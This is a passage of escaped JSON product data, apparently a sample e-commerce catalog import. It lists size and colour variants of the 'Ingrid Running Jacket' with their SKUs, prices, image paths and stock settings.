construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1214\":{\"sku\":\"WJ04-M-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-M-White\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-m-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj04-white_alt1.jpg,\\/w\\/j\\/wj04-white_alternate.jpg,\\/w\\/j\\/wj04-white_back.jpg\",\"image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj04-white_alt1.jpg,\\/w\\/j\\/wj04-white_alternate.jpg,\\/w\\/j\\/wj04-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},\"1215\":{\"sku\":\"WJ04-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-L-Orange\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1216\":{\"sku\":\"WJ04-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-L-Red\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1217\":{\"sku\":\"WJ04-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-L-White\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj04-white_alt1.jpg,\\/w\\/j\\/wj04-white_alternate.jpg,\\/w\\/j\\/wj04-white_back.jpg\",\"image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj04-white_alt1.jpg,\\/w\\/j\\/wj04-white_alternate.jpg,\\/w\\/j\\/wj04-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},\"1218\":{\"sku\":\"WJ04-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-XL-Orange\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1219\":{\"sku\":\"WJ04-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-XL-Red\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1220\":{\"sku\":\"WJ04-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-XL-White\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj04-white_alt1.jpg,\\/w\\/j\\/wj04-white_alternate.jpg,\\/w\\/j\\/wj04-white_back.jpg\",\"image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj04-white_alt1.jpg,\\/w\\/j\\/wj04-white_alternate.jpg,\\/w\\/j\\/wj04-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},\"1221\":{\"sku\":\"WJ04\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Jacket|Lightweight|Full 